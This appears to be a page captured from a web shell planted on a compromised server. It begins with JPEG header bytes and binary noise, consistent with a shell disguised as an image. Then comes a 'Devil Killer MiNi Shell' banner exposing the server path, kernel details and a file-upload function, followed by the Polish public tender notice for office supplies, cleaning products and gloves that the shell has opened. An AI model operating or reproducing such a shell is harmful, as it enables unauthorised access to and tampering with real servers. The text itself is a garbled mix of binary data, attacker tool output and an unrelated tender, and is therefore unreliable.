JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20230102/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20230102/0000109301-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Dostawa art. biurowych, dostawa środków czystości i artykułów do utrzymania czystości oraz dostawa rękawic ochronnych z podziałem na zadania. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Miejski Zakład Oczyszczania w Pruszkowie sp. z o.o.</span></h3> <h3 class="mb-0">1.3.) Oddział zamawiającego: <span class="normal">MZO Pruszków</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 016137494</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Stefana Bryły 6</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Pruszków</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">05-800</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL913 - Warszawski zachodni</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">przetargi@mzo.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.mzo.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - osoba prawna, o której mowa w art. 4 pkt 3 ustawy (podmiot prawa publicznego)</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Środowisko</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Dostawa art. biurowych, dostawa środków czystości i artykułów do utrzymania czystości oraz dostawa rękawic ochronnych z podziałem na zadania. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-a3224342-8a7d-11ed-94da-6ae0fe5e7159</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00001093</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-01-02</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://mzo.eb2b.com.pl/ <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://mzo.eb2b.com.pl/</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">zgodnie z regulaminem powyższej strony</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1.	Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”, Zamawiający informuje, że:<br/>1)	administratorem Państwa danych osobowych jest: Miejski Zakład Oczyszczania w Pruszkowie sp. z o.o. reprezentowany przez Prezesa Zarządu, ul. Stefana Bryły 6, 05-800 Pruszków.<br/>2)	Kontakt z Inspektorem Ochrony Danych - iod@mzo.pl.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">MZO/01/2023</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">3</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> a.)	Za Zestawienie art. biurowych<br/>Lp.	Nazwa J.M.	Ilość	OPIS<br/>1	Papier xero A4 1ryza = 500 arkuszy	Ryza	1500	do użytku we wszystkich urządzeniach biurowych, gramatura 80g/m2 -OFFICE PRODUCTS UNIVERSAL/SYMBIO COPY/IMAGE VOLUME. <br/>2	Korektor taśma	Szt.	20	Pentel . Wymiary 5mm x 12 m. <br/>3	Długopis zwykły	Szt.	200 Długopis niebieski BIC Round Stic M. <br/>4	Bloczki żółte samoprzylepne 76x76	Op.	150	1 op. = 100szt.<br/>5	Brulion A4	Szt.	15	w kratkę, 96 kartek<br/>6	Brulion A5	Szt.	15	w kratkę, 96 kartek<br/>7	Dziurkacz	Szt.	10	min. Od 40-50 kartek<br/>8	Folia strecz transparentna Szt.	20 <br/>9	Gumki recepturki	Op.	5	1 op. = 0,5kg<br/>10	Holder z taśmą	Op.	150	Holder wykonany z przezroczystego tworzywa. Wyposażony w taśmę. W opakowaniu 50 szt.<br/>11	Kalkulator biurowy	Szt.	5	citizen ct-666N<br/>12	Koperta białe C5	Op.	50	samoklejące z paskiem , 1 op. = 500szt. 162x229 mm<br/>13	Koperta Listowa C6	Op.	20	1 op. = 1000 szt. Samoklejące.<br/>14	Koperta rozszerzane boki i dołem	Op.	50	C4, biała.<br/>15	Koperty białe C4	Op.	20	samoklejące, 1 op. = 250szt. 229x324 mm . <br/>16	Kostka papierowa biała	Szt.	20	klejona z boku.<br/>17	Koszulki na dokumenty A4 Op.	100	1 op. = 100szt., otwierane z góry, folia PP 40 mic. Wytrzymałe – krystaliczne.<br/>18	Marker	Op.	15	permanentny, czarny, czerwony, zielony, grubość linii pisania 1-5mm.<br/>19	Marker niezmywalny	Op.	10	Kolor czarny BN15.<br/>20	Nożyczki	Szt.	10	uniwersalne - do cięcia papieru, kartonu, taśmy samoprzylepnej; ze stali nierdzewnej, uchwyt odporny na pęknięcia, rozmiar min. 17cm.<br/>21	Ołówki zwykłe HB Szt.	30	BIC z gumką<br/>22	Papier do drukarki igłowej (kopia+orginał)	Op.	30	wym. 24cm x 30,5 cm (z dziurkami).<br/>23	Pinezki	Op.	5	1 op. = 50 szt., typu &#34;beczułki&#34;.<br/>24	Pudła archiwizacyjne	Szt.	20	do przechowywania dokumentów A4, typu Esselte 100mm.<br/>25	Segregator A5 75 mm	Szt.	20	oklejony na zewnątrz folią PP.<br/>26	Segregator A4 75 mm	Szt.	40	oklejony na zewnątrz folią PP.<br/>27	Skoroszyt miękki do wpinania A4	Op.	50	1 op. = 25szt.<br/>28	Spinacze metalowe duże	Op.	30	1 op. = 100szt., okrągłe, wymiar 77mm.<br/>29	Spinacze metalowe średnie	Op.	30	1 op. = 100szt., okrągłe, wymiar 28mm.<br/>30	Szufladka na dokumenty dymiona	Szt.	5	Format A 4. Możliwość ustawiania w 3 pozycjach.<br/>31	Taśma pakowa	Szt.	10	Kolor przezroczysty. Wytrzymała na zrywanie. Wymiary 48mm- 50 m.<br/>32	Taśma klejąca	Szt.	30	przezroczysta, wymiary 18mm x 20m.<br/>33	Teczka wiązana A4	Op.	50	kartonowa, biała, 1op = 50 szt.<br/>34	Teczka na gumkę A4	Op.	10	usztywniana, kolorowa, 1op = 50 szt.<br/>35	Tusz do pieczątek	Szt.	20	niebieski i czarny.<br/>36	Zakładki indeksujące	Op.	3	3 M post – it 15X50 mm, 5 kolorów neonowych 5x 100.<br/>37	Zakreślacz fluorescencyjny	Komplet	20	żółty, różowy, zielony, pomarańczowy, 2-5 mm.<br/>38	Zawieszki do kluczy Op.	50	1 opakowanie = 50 sztuk.<br/>39	Zszywacz biurowy	Szt.	8	min. 30 kartek, zszywki:24/6.<br/>40	Zszywki 24/6	Op.	50	1 op. = 1000szt. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">30190000-7 - Różny sprzęt i artykuły biurowe</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2023-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.12.) Opis wznowienia</h3> Zamawiający przewiduje możliwość udzielenia zamówień, o których mowa w art. 214 UST. 1 PKT. 7 PZP w okresie 3 lat od dnia udzielenia zamówienia podstawowego dotychczasowemu Wykonawcy w wysokości do 20 % wartości zamówienia w zakresie poszczególnych zadań: <br/>1) polegających na powtórzeniu podobnych usług w przypadku konieczności wywozu większej ilości odpadów nie ujętych w zamówieniu podstawowym, <br/>2) w przypadku wyczerpania się ilości związanych z przedmiotem zamówienia,<br/>3) w przypadku wygaśnięcia czasu obowiązywania umowy określonego we wzorze umowy. <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">termin płatności</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">czas dostawy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> b.)	Zestawienie środków czystości i artykułów do utrzymania czystości<br/>Lp.	Nazwa J.M.	Ilość	OPIS<br/>1	Ad 107 neutralizator	Szt.	50	pŁyn do neutralizowania zapachu do pisuarów 1L. PH~3.<br/>2	Ad 108 Szt.	50	usuwanie nalotów solnych (5L) - PH ~1 kwaśny.<br/>3	Ad 770	Szt.	50	Silny środek do prania wykładzin i tapicerek o zwielokrotnionej sile usuwania brudu. Nie zawiera składników powierzchniowo czynnych. Rozpuszcza nawet najbardziej oporne plamy z oleju, tłuszczu czy nikotyny. Wielokrotnie zwiększa odporność powierzchni czyszczonej na ponowne zabrudzenie. PH 8,7.<br/>4	Ad 919	Szt.	20	Do doczyszczania wszystkich wodoodpornych podłoży odpornych na alkaliczne środowisko. Produkt posiada właściwości silnie odtłuszczające i penetrujące. Produkt w wyższych stężeniach zdejmuje grube nawarstwione tłuszcze i inne zabrudzenia. Przeznaczony do warsztatów. PH~14.<br/>5	Ajax	Szt.	100	Płyn uniwersalny do mycia powierzchni (zapach egzotyczny) Pojemność: 5 L. <br/>6	Barlon S8	Szt.	80	Superkoncentrat do mycia sanitariatów. Pojemność: 5 L . Antybakteryjny koncentrat przeznaczony jest do codziennego lub gruntownego mycia wszystkich powierzchni i przedmiotów w sanitariatach odpornych na działanie kwasów. Zalecany do mycia umywalek, muszli klozetowych, pisuarów, kabin prysznicowych i armatury łazienkowej, posadzek i powierzchni nadpodłogowych (glazury, terakoty, gresu). Nie niszczy mytych powierzchni. Usuwa resztki mydła, osady mineralno-wapienne, tłuszcz, rdzę, pleśń oraz zanieczyszczenia z fug. Myte powierzchnie pozostają czyste, lśniące i o przyjemnym zapachu. Polecany do utrzymania higieny w sanitariatach i higieny kuchennej. ph ~1. Produkt profesjonalny. <br/>7	Chusteczki do dezynfekcji rąk Op.	100	Spektrum biobójcze: bakterio-, drożdżako-, grzybo-, prątko- i wirusobójcze. W opakowaniu 100 szt.<br/>8	CIF (xxl pack)	Szt.	50	Preparat do czyszczenia powierzchni emaliowych plastikowych. Pojemność: 2 L <br/>9	Cilit	Szt.	50	Żel (kamień i rdza) Pojemność 420 G. <br/><br/>10	Clinex nanochem Delos Shine	Szt.	50	Płyn do pielegnacji mebli pozostawiający połysk. Pojemność : 1 L , PH ~ 6 <br/>11	Clinex nanochem Glass	Szt.	50	Płyn do mycia szyb. Pojemność: 5 L . PH -10 <br/>12	Clinex (nanochem) W3 Active	Szt.	40	Preparat gotowy do mycia sanitariatów i łazienek. Nie zawiera chloru. Pojemność : 1 L (BIO). PH~ 3 . <br/>13	Domestos	Szt.	80	Zagęszczony płyn czyszcząco-dezynfekujący. Butelka 750 ml. <br/>14	Gąbki do naczyń	Op.	100	Wymiary 8 X 14 cm<br/>15	Kostka WC BREF	Op.	100	OP.<br/>16	Krem ochronny do rąk 150 ml	Szt.	4000	krem do rąk i paznokci, ochronny olej z bawełny &amp; proteiny jedwabiu (cztery pory roku). Pojemność 150 ml. <br/>17	Ludwik płyn do mycia naczyń (miętowy)	Szt.	80	5 kg. doskonale rozpuszcza tłuszcz, działa również w zimnej wodzie, nie pozostawia smug i zacieków. <br/>18	Mydło w kostce 100g	Op.	4000	o właściwościach antybakteryjnych..<br/>19	Mydło w płynie antybakteryjny Szt.	300	5l, ph neutralne. <br/>20	odświeżacz One Shot” Kashmir marki Freshtek	Szt.	40 Perfumowany odświeżacz powietrza. Zapach z akordami egzotycznych drzew i orientalnych ziół. Pojemność : 600 ml<br/>21	Odświeżacz powietrza 3w 1 Zgrzewka	200	300ml; zgrzewka=12 szt.<br/>22	papier toaletowy Jambo 120 prestige	Op.	30	Papier toaletowy JUMBO WEPA Prestige 19/120//2 śnieżnobiały. W opakowaniu : 12 szt.<br/>23	Papier toaletowy <br/> Op.	300	papier toaletowy, 2 warstwowy, 100mb/19cm 1 op. =12szt.<br/>24	Pasta BHP ze ścierniwem 500 g	Szt.	300	zawartość: mydło+detergent, granulowane ścierniwo z właściwościami nawilżającymi.<br/>25	Płyn do dezynfekcji rąk Szt.	70	PBM SEPT 5L o działaniu wirusobójczym.<br/>26	Recznik papierowy &#34;ZZ&#34;	Op.	100	tzw. Składane chusteczki/papier.<br/>27	Ręcznik papierowy przemysłowy Op.	100	ręcznik w rolce biały celulozowy, długość rolki min. 140 mb, 1 op.=6 szt. Przerywany Z możliwością wyjęcia rolki z środka, by móc umiescić do dozowników marki: LUKART.<br/>28	Ręcznik papierowy Lukart	Op.	300	Ręcznik papierowy eko w roli Lucart Econatural L One Maxi 852277, Dwuwarstwowe ręczniki papierowe eko z linii LUCART L-ONE Maxi 45. <br/>Kolor brąz Wykonane z surowca Fiberpack. Ilość sztuk w opakowaniu: 6. Rolka o długości 158 metrów i szerokości 19 cm. <br/>Pasujący do dozownika Lukart.<br/>29	Szczotka do szorowania z trzonkiem	Szt.	5	Szczotka posiadające twarde włosie (do szorowania np. terakot, tarasu, płytek).<br/>30	Szczotka toaletowa do WC z pojemnikiem	Szt.	20	Zestaw do WC (szczotka + pojemnik).<br/>31	Ściereczki z mikrofibry do wycierania kurzu	Szt.	40 <br/>32	Wiadro z sitem	Szt.	20	Wiadro z elastycznym sitem. Wykonane zostało z trwałego tworzywa wysokiej jakości. Uchwyt na drążek. Typu Vileda.<br/>33	Wkład nakręcany do mopa typu Vileda fioletowy Szt.	50	1 op.=1 szt.<br/>34	Wkładki do pisuarów	Szt.	50 <br/>35	Zmiotka z szufelką	Szt.	40	Zestaw do sprzątania (zmiotka + szufelka). </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">24960000-1 - Różne produkty chemiczne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2023-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.12.) Opis wznowienia</h3> Zamawiający przewiduje możliwość udzielenia zamówień, o których mowa w art. 214 UST. 1 PKT. 7 PZP w okresie 3 lat od dnia udzielenia zamówienia podstawowego dotychczasowemu Wykonawcy w wysokości do 20 % wartości zamówienia w zakresie poszczególnych zadań: <br/>1) polegających na powtórzeniu podobnych usług w przypadku konieczności wywozu większej ilości odpadów nie ujętych w zamówieniu podstawowym, <br/>2) w przypadku wyczerpania się ilości związanych z przedmiotem zamówienia,<br/>3) w przypadku wygaśnięcia czasu obowiązywania umowy określonego we wzorze umowy. <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">termin płatności</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">czas dostawy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> c.)	Zestawienie rękawic ochronnych<br/>Lp.	Nazwa	J.M.	Ilość	OPIS<br/>1	Rękawice ocieplane ochronne	Para	2000	producent: DRAGON, model: RWD zgodne z normami EN388 (poziomy odporności: 1 3 3 1), EAN: 5907522918880, EN511 (poziomy odporności: X 2 X) i EN420, opakowanie: 18,00 kg / 47x69x27cm - 0.0876m3, z przeznaczeniem do prac w niskiej temperaturze zewnętrznej, odporne na zużycie, rozdarcie i powstawanie pęknięć. ROZMIAR od s do XL. <br/>2	Rękawice robocze nitrylowe	Para	40 000	model RNITŻ, bawełna powlekana zanurzeniowo w 3/4 gładkim nitrylem. Zakończone elastycznym ściagaczem. Dobra odporność na ścieranie. Ochrona przed olejami, smarami i tłuszczami. Komfortowe wygodne, zapewniają dobrą chwytność, swobodę ruchów i elastyczność CE kat.II EN 420, En 388 - opakowanie zbiorcze 12/120. Odporność na ścieranie - 4, odporność na przecięcia - 1, wytrzymałość na rozdzieranie - 1, odporność na przekłucie - 1. <br/>Rozmiar : od S do XL. <br/>3	Rękawice uniwersalne -wampirki wzmacniane	Para	40 000	Ruflex, model: Kategoria 1 EN -420 podwójnie oblewane. Kolor: Niebiesko-biały. Rozmiar: od S do XL. Wysoka jakość, bawełna 100%. Strona chwytna powleczona podwójną warstwą lateksu. Rękawica przeciwślizgowa, mająca wysoką odporność na przetarcie oraz ścieranie, rozdarcie i pękanie. Grzbiet dzianinowy umożliwia oddychanie skóry rąk, zmniejsza potliwość i temperaturę. Przedłużony ściągacz zapobiega z zsuwaniu z ręki. <br/>4	Rękawice gumowe grube	Para	50	rozmiar: od S do XL , kolor: żółty.<br/>5	Rękawice nitrylowe jednorazowe	Op.	50	100szt. w 1 op. , rozmiar: od S do XL<br/>6	Rękawice ochronne powlekane gumą zakończone ściągaczem tzw. Wampirki	Para	8000	100%bawełna (wentylacja dłoni) Rozmiar: od S do XL <br/>7	Wkłady bawełniane	Para	500	Rozmiar od S do XL </p> 